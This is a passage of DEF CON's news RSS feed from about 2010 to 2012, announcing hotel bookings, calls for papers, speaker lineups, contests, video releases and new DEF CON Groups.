https://www.defcon.org/defconrss.xml You can now book a room at the Rio for DEF CON 20 at our group rate! Do this one of two ways: Go to http://www.totalrewards.com/hotel-reservations?propCode=RLV&groupCode=SRDEF12, or call the hotel directly at 888-746-6955 and reference group code SRDEF12. The nightly rates are split up as follows: 7/22 through 7/26 is $104 7/27 and 7/28 is $118 Then 7/29 through 7/31 is again $104 Get on it soon! Space is limited!

==> The DEF CON 20 Call for Papers is Open!

https://www.defcon.org/defconrss.xml It's time again, friends, for the DEF CON Call for Papers to Open! Read the CFP announcement and fill out the CFP form to have the chance to present your ninja research at DEF CON's 20th Anniversary!

==> DC20 CTF Announcement!

https://www.defcon.org/defconrss.xml Exciting news regarding the Capture the Flag Competition at DEF CON 20! Check out the announcement here.

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Paul Renda discusses the elements of what could make a successful doomsday worm in this new Speaker's Corner entitled "A Prima On An Internet Doomsday Worm."

==> Merry Christmas from DEF CON! Here's a Special Gift!

https://www.defcon.org/defconrss.xml It seems Santa has been in our servers, (I don't know how he does it, he must be 1337) and has left you a special gift! The Speaker & Slides video, as well as the the Audio from DEF CON 19 is now live and awaiting your downloading pleasure. You can find them on the DEF CON 19 Archive page, or on the following RSS Feeds: https://www.defcon.org/podcast/defcon-19-video.rss https://www.defcon.org/podcast/defcon-19-audio.rss As 2011 winds down, we're working hard behind the scenes for a spectacular 20th anniversary of DEF CON in 2012! So keep your eyes on the DEF CON Facebook, Twitter, RSS Feed, or defcon.org for all the info as it happens! Enjoy!

==> Welcome New DEF CON Groups!

https://www.defcon.org/defconrss.xml We'd like to welcome the following new groups to the DCG fold! Domestic DC317 - Indianapolis, IN DC614 - Columbus, OH DC765 - Lafayette, IN DC909 - Pomona, CA International DC00497151 - Stuttgart, Germany DC00977 - Lalitpur, India DC02139 - Kiev, Ukraine DC110006 - Delhi, India DC15033 - Casale Monferrato, Italy DC560001 - Bengaluru, India DC636 - Mexicali, Baja California, Mexico DC700077 - Kolkata, Westbengal, India DC880 - Dhaka, Bangladesh DC91022 - Mumbai, India DC91361 - Guwahati, India You can find out more about DEF CON Groups on the DCG FAQ, or follow DCG happenings on Facebook!

==> Christmas Deal on DEF CON 19 DVD Sets From TSOK!

https://www.defcon.org/defconrss.xml If you're looking for the perfect Hacker gift, you can purchase the full DVD sets from DEF CON 19 from The Source of Knowledge at discounted prices up through Christmas Eve!

==> Hacker Jeopardy, Hacker Pyramid and Closing Ceremonies Video!

https://www.defcon.org/defconrss.xml Even though Halloween has come and gone, we have some tasty video treats for your viewing pleasure! Check out the videos from 10,000 Hacker Pyramid, Hacker Jeopardy, and the DEF CON 19 Closing Ceremonies, and you can enjoy or re-live some of the fun we had at DEF CON 19! 10,000 Hacker Pyramid and Hacker Jeopardy - Friday Night 10,000 Hacker Pyramid and Hacker Jeopardy - Saturday Night DEF CON 19 Closing Ceremonies

==> DEF CON 19 Video is Live!

https://www.defcon.org/defconrss.xml At long last, we would like to present the DEF CON 19 video presentations (slides w/ audio of the talk) for your viewing enjoyment! You can access them on the DEF CON 19 Archive page, or on the RSS Feed at https://www.defcon.org/podcast/defcon-19-slides.rss!

==> Welcome New DEF CON Groups!

https://www.defcon.org/defconrss.xml A big welcome to the most recent additions to DEF CON Groups! Domestic 402 - Omaha, NE 410 - Baltimore, MD 509.1 - Spokane, WA 702 - Las Vegas, NV 801 - Salt Lake City, UT 805 - Thousand Oaks, CA International 003348 - Presidencia Roque Senz Pea, Chaco, Argentina 0101 - Bogata, Columbia 0131 - Casale Monferrato, Italy 0497 - Kerala, India 303002 - Jaipur, India 6221 - Jakarta, Indonesia 9180 - Bangalore, Karnataka, India 91824 - Mangalore, Karnataka, India 941 - Colombo, Sri Lanka 9663 - Dhahran, Saudi Arabia To find the DEF CON Group in your area check out the DCG Listing Page. If there isn't one, you can start one! Check out the DCG Point of Contact FAQ for details.

==> Download the DEF CON 19 DVD!

https://www.defcon.org/defconrss.xml We have posted the DEF CON 19 DVD content on media.defcon.org in two .iso images, one is the original DVD distributed at the show, and the other contains all the same content, but with the updated slide decks from the speakers. Download them at the following links: https://media.defcon.org/dc-19/defcon-19-dvd-original.iso (~1.6 GB) https://media.defcon.org/dc-19/defcon-19-dvd-updated.iso (~1.7 GB) Enjoy!

==> Press Page updated for DEF CON 19!

https://www.defcon.org/defconrss.xml Check out the DEF CON Press Archive or the DEF CON 19 Archive page to see what the top stories of DEF CON 19 were all about! We hear we will be receiving the audio and slide video from DC19 soon, so keep your eyes on our Twitter and Facebook pages for the heads up when we get it posted!

==> Contest Results Page is Up!

https://www.defcon.org/defconrss.xml Check out the results of many of the innovative and challenging contests that occurred at DEF CON 19. If you ran a contest and would like the results posted, email them to neil [at] defcon ]dot[ org and we'll get them up!

==> New Presentation Materials RSS Feed

https://www.defcon.org/defconrss.xml Many of you know about our Archive Page, recently we uploaded all the presentation materials from DEF CON 19. The thought occurred to us, what if you want to download them all at once and in an attractive RSS? So we made one. Not all presentations have PDF enclosures but we wanted to be complete and list every abstract and Bio we had for our speaker roster. As soon as we can encode and post the Audio and Video RSS we will, in the meantime, enjoy the DEF CON 19 Materials. Join the discussion thread on the DEF CON Forums: https://forum.defcon.org/forumdisplay.php?f=611. Don't forget to join our Facebook page www.facebook.com/defcon to get involved as well.

==> The DEF CON 19 Archive Page is up, slides posted!

https://www.defcon.org/defconrss.xml Head on over to the DEF CON 19 Archive page, where you can find the slides submitted for this year's talks! You can also download a copy of the Program guide. Keep an eye on this page for updates in the coming weeks, including press, video, audio, music and other great stuff from DEF CON 19!

==> Thanks for a Great Con!

https://www.defcon.org/defconrss.xml Well another DEF CON has come and gone, and was it ever a great one! We'd like to give a huge shout out to all of you who attended and made it all worthwhile! Big thanks to all of the speakers, workshop instructors, contest/event & village organizers, and vendors who provide so much awesome content for this con! Not to mention the multitudes of goons who make it all run like a well-oiled machine, as well as the fantastic staff at the Rio who went above and beyond for this unknown (to them) and crazy group of 11-12 thousand hackers! We are still reeling that the first year in a new hotel ran so smoothly! We're back in the saddle now after a little much needed R&R, so you can expect the content, press, contest results, and highlights to start rolling in over the next few days and weeks. In fact, it seems like the planning crew is already psyched and bursting at the seams with great ideas for next year, our 20th anniversary! Expect it to be epic! Keep your eyes on the DEF CON RSS, Twitter and Facebook pages for the latest updates as they roll in. Also check out the DEFCON 19 and Beyond Forum on the DEF CON Forums for all of the disussions about this year's show!

==> Huge Speaker Update!

https://www.defcon.org/defconrss.xml Here are 46 more reasons to be at DEF CON 19! Read On...

==> DEF CON Workshops are Live!

https://www.defcon.org/defconrss.xml New for Def Con 19, Workshops extends the experience of learning to the classroom. Take your time and get it right by getting some hands-on time with hardware, software, and picking the minds of some of the most interesting hackers in their fields. Bring your thinking cap and get ready to be schooled. Read On...

==> The DEF CON Awards!

https://www.defcon.org/defconrss.xml New, for DEF CON 19 - the DEF CON Awards! DEF CON introduces the DEF CON Awards to recognize people/projects/companies for their competence (or lack thereof) in the hacking or security world. Nominations will be accepted for the categories below until July 6th, 2011. Voting will be conducted online for three of the categories from July 8th - July 29th, 2011 (voting link will be provided at a later time). Do you have a favorite hacker oriented author that best represents the hacker lifestyle and scene? Do you have inside knowledge of the most interesting malware to hit the net this year? Or was there a media outlet that best represents the WORST in coverage of real news concerning hackers or security topics? Now's your chance to have a voice. Get your nominations in today, and give credit where credit is due. Be sure to provide supporting information, such as links to websites, news articles, or software. Turn in your nominations here: http://www.surveymonkey.com/s/2JDHC23

==> So Many Speakers!

https://www.defcon.org/defconrss.xml Take a minute to peruse this fantastic set of additions to the DEF CON 19 line-up! Fingerbank — Open DHCP Fingerprints Database Olivier Bilodeau PacketFence, The Open Source Nac: What We've Done In The Last Two Years Olivier Bilodeau Kinectasploit: Metasploit Meets Kinect Jeff Bryner Metasploit vSploit Modules Marcus J. Carey and David Rude Look At What My Car Can Do Tyler Cohen VDLDS — All Your Voice Are Belong To Us Ganesh Devarajan and Don LeBert Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston, Josh Abraham, and Kevin Johnson Handicapping the US Supreme Court: Can We Get Rich by Forceful Browsing? Foofus Strategic Cyber Security: An Evaluation of Nation-State Cyber Attack Mitigation Strategies Kenneth Geers Smartfuzzing the Web: Carpe Tuorum Foramina Nathan Hamiel, Gregory Fleischer, Justin Engler, and Seth Law Economics of Password Cracking in the GPU Era Robert "Hackajar" Imhoff-Dousharm Battery Firmware Hacking Charlie Miller Big Brother on the Big Screen: Fact/Fiction? Nicole Ozer Archive Team: A Distributed Preservation of Service Attack Jason Scott Insecurity: An Analysis Of Current Commercial And Government Security Lock Designs Marc Weber Tobias, Matt Fiddler, and Tobias Bluzmanis DIY Non-Destructive Entry Schuyler Towne Seven Ways to Hang Yourself with Google Android Jacob West and Yekaterina Tsipenyuk ONeil Key Impressioning Jos Weyers Phishing and Online Scam in China Joey Zhu Vanquishing Voyeurs: Secure Ways To Authenticate Insecurely Zoz and Andrea Bianchi

==> New Talks

https://www.defcon.org/defconrss.xml Here's another bundle of talks to whet your appetite for DEF CON Madness! More to come in the next couple days! (Read on...)

==> Talks Keep on Coming!

https://www.defcon.org/defconrss.xml Another batch of fine DEF CON content has been added to the mix! Check out newest additions to our line-up! The Art and Science of Security Research Greg Conti Internet Kiosk Terminals : The Redux Paul Craig Introduction to Tamper Evident Devices datagram Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests Rob Havelt and Wendel Guglielmetti Henrique Sounds Like Botnet Itzik Kotler and Iftach Ian Amit Panel: Is it 0-day or 0-care? Jake Kouns, Brian Martin, Steve Christey, Carsten Eiram, Art Manion, Dan Holden, Alex Hutton and Katie Moussouris Vulnerabilities of Wireless Water Meter Networks John McNabb Blinkie Lights: Network Monitoring with Arduino Steve Ocepek My password is: #FullOfFail! — The Core Problem with Authentication and How We Can Overcome It Jason M. Pittman Mobile App Moolah: Profit taking with Mobile Malware Jimmy Shah Weaponizing Cyberpsychology and Subverting Cybervetting for Fun, Profit and Subterfuge Chris "TheSuggmeister" Sumner and alien Staring into the Abyss: The Dark Side of Crime-fighting, Security, and Professional Intelligence Richard Thieme

==> DC19 CTF Quals Update!

https://www.defcon.org/defconrss.xml Another DEF CON CTF Qualification round has passed, and with it 12 teams will ascend to their slots in the DEF CON 19 Capture the Flag Competition. The qualifying teams have not been posted just yet, so keep an eye on ddtek.biz for the winners, and we'll announce them as well when we have the results. For now, we have collected as many write-ups as we could find from this year's Quals for your consumption! (Read on...)

==> More Speakers Posted!

https://www.defcon.org/defconrss.xml Another poppin' fresh batch of speakers is now live on the speaker page. Here's a handy list of the new offerings! Bosses love Excel, Hackers too. Chema Alonso and Juan Garrido "Silverhack" Three Generations of DoS Attacks (with Audience Participation, as Victims) Sam Bowne Familiarity Breeds Contempt Sandy "Mouse" Clark and Brad "RenderMan" Haines Cipherspaces/Darknets: An Overview Of Attack Strategies Adrian Crenshaw "Irongeek" Speaking with Cryptographic Oracles Daniel Crowley Smile for the Grenade! "Camera Go Bang!" Vlad Gostom and Joshua Marpet Assessing Civilian Willingness to Participate in On-Line Political and Social Conflict Thomas J. Holt and Max Kilger Hacking and Securing DB2 LUW Databases Alexander Kornbrust PIG: Finding Truffles Without Leaving A Trace Ryan Linn Hacking .Net Applications: The Black Arts Jon McCoy Safe to Armed in Seconds: A Study of Epic Fails of Popular Gun Safes Deviant Ollam Port Scanning Without Sending Packets Gregory David Pickett

==> CTF Qualification Round Begins Tomorrow!

https://www.defcon.org/defconrss.xml You only have a few scant hours left (00:00:00 UTC) to register for the DEF CON 19 CTF Quals, which begin tomorrow at 19:00:00 UTC. This is the event that separates the hackers from the kiddies, to send the top 12 teams to battle for the glory that comes with winning a DEF CON Capture the Flag Competition. Register and get all the info at http://ddtek.biz!

==> New Contests and Events!

https://www.defcon.org/defconrss.xml Check out a few of the new contests and events coming to DEF CON 19! DEF CON Beard & Moustache Championships Due to the growing number of awesome beards at DEFCON and the (popularity?) of the shitshow that is beardsmanship, it's time that folks were recognized for letting their unix beards fly. DEF CON Radio Defcon Radio will be streaming live radio action 24/7 during the con. Speaker interviews, news, party coverage...correspondants will crawl the trenches of con to bring you entertainment. Are you not entertained? DEF CON Bike Rent bicycles, hire a guide, and endure a 2 Hour bike ride in the Las Vegas heat! Got Water? Forensics Contest The Network Forensics Puzzle Contest is a challenging mystery requiring contestants to forensically analyze packet captures (and more!) to uncover an evil plot.

==> DEF CON 19 Artwork Contest and Short Story Contest is Open!

https://www.defcon.org/defconrss.xml The DEF CON Artwork Contest is again underway! This year's theme is reminiscent of those 60's and 70's spy movies and TV shows like "The Man from U.N.C.L.E", "Our Man Flint", and "James Bond", with a hacker angle and a little grit. We have dubbed this theme "Haxploitation". (Read on...) For the writers, the DEF CON 19 Short Story contest is also open, and similar themed. Find out about it at https://forum.defcon.org/showthread.php?t=12153

==> Time Grows Short.

https://www.defcon.org/defconrss.xml Hola friends! This is just a reminder that deadlines are looming. The Call for Papers ends May 27th, so if you're planning to submit a talk you have just over a week to put that proposal together! Find the CFP Announcement at https://www.defcon.org/html/defcon-19/dc-19-cfp.html, and the Call for Papers form at https://www.defcon.org/html/defcon-19/dc-19-cfp-form.html. Also looming is the deadline for the DEF CON 19 Contest/Event RFI. June 1st is when you need to have your proposal for the latest great or time tested contest or event submitted to Pyr0. You can find the RFI at https://forum.defcon.org/showthread.php?t=12113. Good luck and remember: DEF CON is what you make it.

==> New DEF CON 19 Site, Speakers Up.

https://www.defcon.org/defconrss.xml Check out the spankin new site for DEF CON 19! Have a look around, see what's new, and while you're at it, check out the first batch of Speakers! Deceptive Hacking: How Misdirection Can Be Used Steal Information Without Being Detected Bruce "Grymoire" Barnett Abusing HTML5 Ming Chow Mamma Don't Let Your Babies Grow Up to be Pen Testers - (a.k.a. Everything Your Guidance Counselor Forgot to Tell You About Pen Testing) Dr. Patrick Engebretson and Dr. Josh Pauli Getting F*cked On the River Gus Fritschie and Mike Wright Jugaad – Linux Thread Injection Kit Aseem "@" Jakhar Black Ops of TCP/IP 2011 Dan Kaminsky Hacking Your Victims Over Power Lines Dave Kennedy (ReL1K) DCFluX in: License to Transmit Matt Krick "DCFluX" Balancing The Pwn Trade Deficit – APT Secrets in Asia Anthony Lai, Jeremy Chiu and PK Covert Post-Exploitation Forensics With Metasploit Wesley McGrew VoIP Hopping the Hotel: Attacking the Crown Jewels through VoIP Jason Ostrom Getting SSLizzard Nicholas J. Percoco and Paul Kehrer This is REALLY not the droid you're looking for... Nicholas J. Percoco and Sean Schulte WTF Happened to the Constitution?! The Right to Privacy in the Digital Age Michael "theprez98" Schearer Runtime Process Insemination Shawn Webb Staying Connected during a Revolution or Disaster Thomas Wilhelm Network Application Firewalls vs. Contemporary Threats Brad Woodberg As always, stay tuned to our Twitter, RSS Feed, or Facebook page for all the news as it happens!

==> DEF CON 19 Contest/Event RFI is Live!

https://www.defcon.org/defconrss.xml PyrØ Has posted the DEF CON 19 Contest & Event Request for Information on the DEF CON Forums. If you have, or are currently thinking about running a contest or an event at DEF CON, this is the info you need to be considered for space, power and network connectivity! Submit your contest data by filling out the form at the bottom. Here's a big shout out to Deviant Ollam for being on top of things and being the first to submit an RFI for the Beverage Cooling Contraption Contest!

==> DEF CON 19 Call for Music!

https://www.defcon.org/defconrss.xml Are you a Band or a DJ who wants to perform at DEF CON 19? Then answer the Call for Music freshly posted by DJ Great Scott! You can check out the write-up at https://forum.defcon.org/showthread.php?p=119223 as well as download the application! Hurry up and apply, as the Deadline is Sunday May 15! Good luck!

==> DEF CON 19 Call for Workshops!

https://www.defcon.org/defconrss.xml Are you a leader, 'leet hacker, a ninja in your field? Do you have a passion to teach and share your knowledge? Got something interesting you are dying to talk about? We're looking for workshops from people like you. If you are interested in being part of the very first ever DEF CON Workshop team, submit now! (Read on...)

==> DEF CON 19 News! Pool Hijinks, CTF Quals, and Evidence Tampering

https://www.defcon.org/defconrss.xml Here's what's going on in the world of DEF CON: The Pool Is Open! Bring your suits and stow your tech, because poolside shenanigans in the wee hours are coming back to DEF CON! This year we will have 24hr pool access to Pool 4 (pictured) at the Rio! We're not even April foolin! DDTek Announces CTF Quals! It's that time again, and your first step to joining the ranks of leetness that can only come from a win in the DEF CON Capture The Flag. That's right, DDTek has announced the qualification round for the 2011 DEF CON CTF! Tamper Evident Returns! DT's Tamper Evident Contest is coming back this year with some new surprises. It might be time to brush up on your super sneaky methods for opening things you aren't supposed to, and keep your eye on the Tamper Evident Forum for details as they surface. Stay tuned to our Twitter, RSS Feed, or Facebook page for all the news as it happens!

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Feast your eyes on a new Speaker's Corner by Jack Daniel, which gives you some great tips if you are thinking about submitting a talk for DEF CON!

==> DEF CON 18 Video+Slides returns!

https://www.defcon.org/defconrss.xml We have re-loaded the original videos we posted from DEF CON 18 featuring video of the speaker and video of the slides! Check out the Video RSS Feed or on iTunes and enjoy!

==> The DEF CON 19 Call for Papers is Now Open!

https://www.defcon.org/defconrss.xml More exciting than HBGary's email, world's #1 hacker expose or 5up3r $3kret.gov leak, it is time for the DEF CON Call for Papers to open! What: DEF CON 19 Call For Papers When: The Call for Papers will close on May 27th, 2011 How: Complete the Call for Papers Form and send to talks at defcon dot org DEF CON will take place at the Rio in Las Vegas, NV, USA, August 4 - August 7th, 2011. Read the full announcement at https://www.defcon.org/html/defcon-19/dc-19-cfp.html

==> Contests and Events we'll see at DEF CON 19!

https://www.defcon.org/defconrss.xml Below you'll find a list of some of the fantastic contests and events that have announced intent to return for DEF CON 19! This is not by any means a complete list, and will be growing as planning continues. Artwork Contest(s): No Posts Be The Match Foundation - Bone Marrow Drive: Forum Active Beverage Cooling Contraption Contest: No Posts CTP: Capture the Packet: No Posts Crack Me If You Can: Forum Active Dark Tangent's Tamper Evident Contest: Forum Active DC101: Forum Active DEF CON Geo Challenge: No Posts DEF CON Shoot: Forum Active DEF CON Social Engineering CTF: No Posts Goon Band -- Recognize: No Posts Hacker Karaoke: No Posts Ham license exams: No Posts Lockpicking Contests: No Posts Open CTF: No Posts Scavenger Hunt: No Posts The Summit EFF Fundraiser: No Posts Toxic BBQ: No Posts Wall of Sheep: No Posts In case you didn't know, most of these contests and events started unofficially, with a great idea and some devotion, by attendees who just wanted to do something cool. Yes friend, that means you could be creating the next big DEF CON contest or event! Post your vision to the New Ideas section of the DEF CON Forums, and see what kind of response you get!

==> Rio Registration is Live for DEF CON 19!

https://www.defcon.org/defconrss.xml Here's something for all of you early birds! The DEF CON 19 group room registration at the Rio is now live! The room rates are $99 Sunday thru Thursday and $112 per night on Friday and Saturday. The group rates are valid Monday August 1 to Friday August 12. You may either follow this link: http://www.harrahs.com/CheckGroupAvailability.do?propCode=RLV&groupCode=SRDEF11 Or call the Rio toll free at 1-888-746-6955 and refer to group code: SRDEF11

==> DEF CON Groups News

https://www.defcon.org/defconrss.xml Happy 2011 from DEF CON! DEF CON Groups is undergoing some administrative changes heading into the new year, and we'd like to let you know that long time Goon and friend of DEF CON, Converge, has graciously stepped up to take the reins as DEF CON Groups Coordinator! If you currently run a DCG and want to update your info on the site, or if you are interested in starting a new DCG, you can contact him at dcgroups at defcon dot org. We'd like to extend a big welcome to the following new groups! DC334.1 Montgomery, AL DC808.2 Ewa Beach, HI DC9723 Tel-Aviv, Israel DC1020 Eckental, Germany DC281 Houston, TX Keep an eye open for more from the DEF CON Groups in 2011!

==> Stop. Think. Connect. A Special DHS, PSA Contest

https://www.defcon.org/defconrss.xml Howard Schmidt, Special Assistant to the President and Cyber Security Coordinator has issued a special PSA Contest. This crowd sourcing campaign is in an effort to alert the general public to Stop, Think, then connect, when it comes to their online presence and responsibility. Good, Bad, or otherwise, I would really like to see what the DEF CON community came up with. I am confident that our DEF CON community could come up with some pretty interesting feedback in regards to this contest, I'd love to see and hear the creative ways you would advertise to the general public. I can only imagine the hilarity that would ensure in a minute for a video entitled "How to not be a Noob" or "Phishing & Trolling, not what it was in Grandpa's day." Overall, I have had a love for PSA's since I was a kid. A lot of us remember and have a special place in our hearts for the PSA's of our youth, especially ones of the "The More you Know" variety. Who didn't like watching "This is your Brain on Drugs" or GI JOE telling us that bullying is wrong? I know I did, and "Knowing is Half the Battle". From the contest: "Keeping the Internet safe is a responsibility we all share. We need to take time to stop and think before we connect to the Internet, share information online, or participate in online communities. But sometimes, a creative and compelling reminder can help. That's why the Department has kicked-off the Stop. Think. Connect. PSA Challenge because all Americans have an important role to play in securing the Internet. We are looking for videos that will help educate Americans about Internet safety and what we can all do to protect ourselves and our families online. If you know what it takes to get Americans motivated to improve their safety online, then we need your help. We want videos that inspire Americans to Stop. Think. Connect." For details on the requirements and how to submit visit the contest page at: http://www.dhs.gov/files/events/stop-think-connect-psa-challenge.shtm PSAs must include at least one of the following Internet safety tips: * Keep a Clean Machine * Protect Your Personal Information * Connect with Care * Be Web Wise * Be A Good Online Citizen In similar fashion, I'd love to see if anyone out there posts something on: * Understanding Encryption * Surfing Anonymously * Using Proxy Servers or Feed Over Email * Understanding Copyright, TOS agreements, and Privacy expectations. * Who and What is a Troll and how to defeat them. This past year we had a few talks both in the offense and defense perspectives, check them out on the DC 18 archive, there are too many that fit this topic to list, you might find something that inspires you. I hope you guys & gals out there send in a submission, if you don't want to submit to the official contest, can you send us a link instead? These PSAs would be great to show at DEF CON 19, and if we can, we'd probably like to share some of your clips online so we can get the word out to "Stop. Think. Connect" The contest runs until Feb 14th, Valentines day, so send in your love, send us links, let's get this PSA party started. Good luck! Nikita @niki7a on twitter. Nikita@Defcon.org

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Jack Daniel discusses PCI and the hacker community in a new Speaker's Corner entitled "How Did We End Up Like This?"

==> Video is Back!

https://www.defcon.org/defconrss.xml Video is back up and running! These versions differ from the ones we removed, they are video of the slides only with audio of the talk. You can find them on the Video RSS Feed or on the DEF CON 18 Archive Page!

==> Hacker Jeopardy Slides + Audio

https://www.defcon.org/defconrss.xml Here's a tasty morsel for you, slide video with audio of this year's Hacker Jeopardy! We don't often see this, so if you're interested in playing next year or just want to get an idea of what it's about, this is a great resource! DEF CON 18 Hacker Jeopardy - Friday Part 1 DEF CON 18 Hacker Jeopardy - Friday Part 2 DEF CON 18 Hacker Jeopardy - Saturday Part 1 DEF CON 18 Hacker Jeopardy - Saturday Part 2

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the new Speaker's Corner by the Suggmeister, the follow-up to his "Experiences of a First Time DEF CON Speaker" article before DEF CON 18!

==> Video Update

https://www.defcon.org/defconrss.xml The videos have been taken down for a week or two, as we worked a little too fast to get them up and the production company wasn't ready to release them. We will have slides+audio versions of the videos up and online within the next two weeks, once we receive the right versions and process. Thanks for your patience, and stay tuned to our Twitter, RSS Feed, or Facebook page for the announcement when they go back up!

==> DEF CON 18 Talks - Video is Live!

https://www.defcon.org/defconrss.xml DEF CON 18 talks with the speaker video and slides has been processed and posted! Check 'em out on the Video RSS Feed or on the DEF CON 18 Archive Page!

==> DEF CON 18 Talks - Audio is Live!

https://www.defcon.org/defconrss.xml That is correct folks! You can now listen to all of the awesome DEF CON 18 Talks in .m4b Audiobook format! You can find them on the Audio RSS Feed or on the DEF CON 18 Archive Page! Video is on the way, look for it soon! You can know about it the minute it goes live by keeping up with the DEF CON Facebook page or @_defcon_ on Twitter!

==> DEF CON 18 Tools Page Updated!

https://www.defcon.org/defconrss.xml Swing by the Tools Released page and have a look at all the tools released at DEF CON 18! There are local copies, if available, for your convenience, and links to the project homepages as well!

==> DEF CON 18 Music is posted!

https://www.defcon.org/defconrss.xml That's right, you can now download the sets from The Cyberpunk Gala and the poolside action at https://www.defcon.org/podcast/defcon-18-music.rss! The Zombie Ball is having some technical difficulties but should be up soon as well! We will also have video of the music sets soon as well, so keep an eye peeled.

==> DC18 Contest Results and New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the DEF CON 18 Contest results page for the results of the contests we have received so far! If you ran a contest and have results for us, send them in! We also have a new Speaker's Corner from Schuyler Towne, discussing his secret agenda for locksport! Music sets from the pools and the bleep at DEF CON 18 are being processed, look for it to be posted next week!

==> More DEF CON 18 Press!

https://www.defcon.org/defconrss.xml We've updated the press page with even more DEF CON 18 coverage! Most of the new stuff can be found in the "Other" Category, and in a new category called "Video Coverage" which contains recaps, badge hacks, goon hijinks and more! Check them out on the Press Page, or the DEF CON 18 Archive Page!

==> DEF CON 18 Press And Early Video!

https://www.defcon.org/defconrss.xml Hey everyone! The Press Page and the DC 18 Archive Page have been updated with a ton of stories covering DEF CON 18! Not only that, but we have uploaded the first early release video (slides w/ audio) of a few of the talks, including: DEFCON 18 Hacking Conference Presentation By Joe Grand and Dark Tangent - Welcome And Behind The Scenes Of The DEFCON Badge - Slides.m4v DEFCON 18 Hacking Conference Presentation By Barnaby Jack - Jackpotting Automated Teller Machines Redux - Slides.m4v DEFCON 18 Hacking Conference Presentation By David Maynor and Paul Judge - Searching For Malware - Slides.m4v DEFCON 18 Hacking Conference Presentation By Chris Paget - Practical Cellphone Spying - Slides.m4v DEFCON 18 Hacking Conference Presentation By Md Sohail Ahmad - WPA Too! - Slides.m4v Enjoy! The rest of the audio and video will be up in a couple of months, but for now, enjoy these tasty nuggets of DEF CON goodness!

==> DEF CON 18 Archive Page is Live!

https://www.defcon.org/defconrss.xml The DEF CON 18 Archive Page is up and running! Currently, we have all of the presentation slides, white papers and extras posted, as well as the DEF CON 18 Program in pdf format! Coming in the next week or so we'll have contest results, press, and even a few early release videos! So check it out and begin reliving the glory that was DEF CON 18!

==> DEF CON 18 Post Con Update

https://www.defcon.org/defconrss.xml DEF CON 18 was a resounding success! With more contests, events, attendance and talks, this year's show was a fitting end to our years at the Riviera! We'd like to thank the Riv for working with and hosting us for 5 awesome years! We'd also like to thank all the folks who sacrificed time, effort, and resources to contribute to the hacking community, as well as a huge thank you to all the attendees for showing up and learning, growing and participating in all this con has to offer! We've all had a chance to wind down decompress from all the excitement of DEF CON 18, and all of the results, press, photos, updated materials and other content is rollng in. Starting in the next couple of days and through the next few weeks, we'll be posting all of this info for everyone to enjoy, reflect upon, and learn from. Keep your eyes on defcon.org, the DEF CON RSS feed, our Twitter and Facebook for all the latest updates from the show!

==> PhD Dissertation Study in the Contest Area

https://www.defcon.org/defconrss.xml Take a short survey at the table next to the Info booth in the Contest Area to participate! Here's more info: The US electricity infrastructure relies on Industrial Control Systems (ICS) for better efficiency and reliability. However, these systems are susceptible to cyberattacks, which may disrupt essential power services. How cybercriminals rationalize target selection and attack technique is vital in offering a more comprehensive picture of ICS vulnerabilities, cybercrimes, and security. This Rutgers School of Criminal Justice PhD dissertation research project will survey both ethical hackers and industry representatives. It will assess their views on cybervulnerabilities of the electricity sectors ICS to identify any gaps in their perceptions.

==> New Speakers Corner!

https://www.defcon.org/defconrss.xml Craig Heffner discusses hacking millions of routers and his upcoming talk tomorrow in a new Speaker's Corner!

==> Be the Match at DEF CON

https://www.defcon.org/defconrss.xml Be The Match offers the unique opportunity for you to give a life-saving marrow transplant to someone in need. Thousands of patients with leukemia and other life-threatening diseases depend on the Be The Match Registry, the largest and most diverse registry in the worlds, to find a life-saving donor. The more potential donors that step forward, more resources are available to patients and more lives can be saved. <strong>Description of the donor recruitment drive:</strong> Be The Match will have a booth at DefCon 18 where individuals can register to be part of the Be The Match Registry. All they need to be is between the ages of 18 and 60, meet the health guidelines and be willing to donate to ANY patient in need. At the recruitment drive, you will fill out a consent form with contact information and a short medical evaluation. You will receive more information about what it means to be a donor and then you will swab the inside of your cheeks. Your tissue type will be listed in the Be The Match Registry until your 61st Birthday. If you are a match for someone in need, then you will be contacted for donation.

==> DEF CON 18 Secure Wifi

https://www.defcon.org/defconrss.xml This year we are offering 802.1x/WPA-encrypted wireless access for Internet access. In order to access the "DefCon-Secure" wireless network, you will need to create login information for yourself. We have setup a self-registration website. https://wifireg.defcon.org Go to this site to register a username & password. You can hit it from your phone, WWAN, or the open DefCon wireless. We have also included a copy of the SecureTrust CA root certificate in case your device does not have it in its default certificate trust chain (many systems do, some do not). SSID: DefCon-Secure or DefCon-SecureA for 5.0GHz devices (iPad, newer Macbooks) Network Authentication: WPA2 Data encryption: TKIP or AES Authentication EAP Type: PEAP Authentication Mechanism: EAP-MSCHAP v2

==> More New Speaker's Corner!

https://www.defcon.org/defconrss.xml The Suggmeister provides some insight into the genesis of a talk as a new speaker in this new Speaker's Corner!

==> New Speaker's Corner

https://www.defcon.org/defconrss.xml Matt Ryanczak Talks about IPv6 and the future in this all new Speaker's Corner!

==> Another New Speaker's Corner

https://www.defcon.org/defconrss.xml Tips for getting the most out of your DEF CON experience are discussed in this Speaker's Corner by Nicholas Percoco entitled "Packing It All In"!

==> New Speaker's Corner

https://www.defcon.org/defconrss.xml Lockpick shapes are de-mystified in this part one of a new Speaker's Corner by Schuyler Towne entitled "What's This Lockpick For?"!

==> The Heat is On!

https://www.defcon.org/defconrss.xml There's a ton happening leading up to DEF CON 18 in just twelve more days! The Mystery Challenge is heating up! Check out the Mystery Challenge forum for the latest hijinks! We have some bad news, unfortunately the Geo Challenge will not be happening this year. You can read more about this on the Geo Challenge forum. Our sympathy goes out to the organizers for what promised to be a great contest. Definitely look for it next year! There are some exciting new offerings that have surfaced recently! Among them are: Dark Tangent is busting out the Tamper Evident Contest, in which you debunk the phrase "Impossible to reseal or re-use", and document how you did it! The Backdoor Hiding Contest, in which you test your skills at hiding and finding backdoors. Capture the Packet is a cool new network scavenger hunt. Look for clues, solve puzzles and win prizes! Crack Me If You Can: 53,000 password hashes, 48 hours, nuff said! PCB PWNage is a mini contest from the Hardware Hacking Village to find out who can design the coolest PCB! The Twitter Hunt: Follow @TheSuggmeister and watch for the clues that lead to prizes! For all the latest info on contests and events at this year's DEF CON, check out the 